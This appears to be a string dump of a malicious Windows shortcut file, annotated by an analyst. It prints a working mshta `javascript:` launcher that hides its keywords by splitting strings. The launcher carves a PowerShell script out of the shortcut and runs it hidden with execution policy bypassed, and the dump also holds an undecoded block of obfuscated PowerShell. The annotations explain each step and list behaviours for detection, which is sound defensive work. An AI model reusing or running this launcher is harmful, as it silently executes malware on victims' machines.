Windows
System32
mshta.exe
C:\Windows\System32\mshta.exe
(F*`"^jpSE
win-kejvo9cld80
$bc82=@();$wck0="vw7ICMzkzUgYnbFJSPuNHJyzbc"[21..2];$ehk1="uytUmdv1WZSpQDdhm"[13..2];$syg2="rtyBHXcpzYnASblRXSuwyz"[17..2];$acf3="psMzBnLlxFXhRXYk1WYyd2bxcglr"[22..2];$yfn4="stv7cSwyab"[5..3];$eiko5=$wck0+$ehk1+$syg2+$acf3+$yfn4;$bc82+=$eiko5 -join '';$qwe6="oqsJscCdzVWdxdCLnUmUiV2JgYWLi0XM71HM713M71nM7JCKusjIwlmeuM3ZcxVY0FGZtFmcisiIn9mcwxFX6MmIg0DImJzMwYXbvZWZzRye5JHdgkgCNASCK0wOiETPsRmJ4ZDdrlzNodTP0NnJnNncyBHO4EWen9GewFDMzgmbqZmc0t2Yx1TeltGby9DdhRmLtN1L3EzbzhGd1MzZ5dTOul2a6JTa5k2NvkmZvw2Yz9SbvNmL49mYisiIw9mck5yd3d3LvozcwJyKiQHdoJCI9AidzZHZkACIgACIK0weg0DIxUGJtuwy"[307..3];$zbe7="orwsyJzdnIgIHdvASX3MzN4kDNzITO3s1JrcyZulGZuFGc4V0JrcSZ0FGZwVVZnR2JrcSR0Z2bz9mcjl2JrcSTHFEIuR3LgIDIv12LgUGd15WatByYz9CIlRXYlJ3YvAycrdyKnMXY0h2YzdCI9AyZkASCK0AIJoQD7gGc4VGJgQULgYmMzAjdt9mZlNHJggGdhBVLgUmdph2YyFULk5WYwhXR7ISY0FGZtFmcn9mcQxFX6MkIg0DIoBHelRyO9ZmMzAjdt9mZlN3ekASZslmR0V3TtASf2NndktHJgkyJX1SZrdCLn8mdul0aej"[312..3];$qwe8="oqLgo1UfdURSBCdvAiMldyKnQXYkBXVHBidvAiIudyKnUnUc52bpNnclZFduVmcyV3QcN3dvR2J9M2bxRyOnY2LgICctRnL1QTN2IDX
\Windows
System32
mshta.exe
Y..\..\..\Windows\System32\mshta.exe
// Analyst annotation: this is the argument string handed to mshta.exe by the shortcut.
// It is a single `javascript:` URI; every sensitive keyword is split across string
// concatenations ("pow"+"ershell", "Ac"+"tiveXObject", "WSc"+"ript.Shell"),
// presumably to defeat static string matching (intent not stated in the artifact).
//
// Variables, once concatenated:
//   a = "powershell -ep bypass "        (execution policy bypass prefix, used twice)
//   g = "c:\programdata\"               (drop directory)
//   m = " -Encoding Byte;sc "           (ends the byte-mode read, starts a Set-Content call)
//   p = "$w ([byte[]]($f | select -Skip 0x0942)) -Force"
//   s = JScript that creates WScript.Shell, calls Run(c, 0, true), then close()
//   c = the PowerShell command line described below
//
// What the PowerShell in `c` does, in order:
//   1. $t = 0x1a2b (6699). Looks for a *.lnk in the current directory whose length
//      equals $t; if none is found, looks in $env:TEMP\*\*.lnk with the same size test.
//      NOTE(review): the size presumably matches this shortcut itself - confirm against the sample.
//   2. Reads that file as bytes (gc ... -Encoding Byte), skips the first 0x0942 (2370)
//      bytes, and writes the remainder to c:\programdata\e.ps1 (sc ... -Force -Encoding Byte).
//   3. Writes the value 0 to c:\programdata\4214 (purpose not visible here).
//   4. Runs "powershell -ep bypass -f" on the carved e.ps1.
//
// eval(s) then executes the launcher: Run(c, 0, true) uses window style 0 (hidden) and
// waits for completion before close() ends the mshta window.
//
// Observable behaviors for detection, all taken from this line: mshta.exe started with a
// `javascript:` argument, a powershell.exe child carrying `-ep bypass`, and creation of
// c:\programdata\e.ps1 and c:\programdata\4214.
javascript:a="pow"+"ershell -ep bypa"+"ss ";g="c:\\pro"+"gramdata\\";m=" -Encoding Byte;sc ";p="$w ([byte[]]($f "+"| select -Skip 0x0942)) -Force";s="a=new Ac"+"tiveXObject('WSc"+"ript.Shell');a.Run(c,0,true);close();";c=a+"-c $t=0x1a2b;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -ExpandProperty Name;if($k.co"+"unt -eq 0){$k=G"+"et-ChildItem $env:TEMP\\*\\*.l"+"nk | where-object{$_.length -eq $t};};$w='"+g+"e.ps1';$f=gc $k"+m+p+m+g+"4214 0;"+a+"-f $w;";eval(s);
System32 (C:\Windows)
S-1-5-21-2289896217-3033761267-3699187338-1000
mshta.exe
Application
C:\Windows\System32\mshta.exe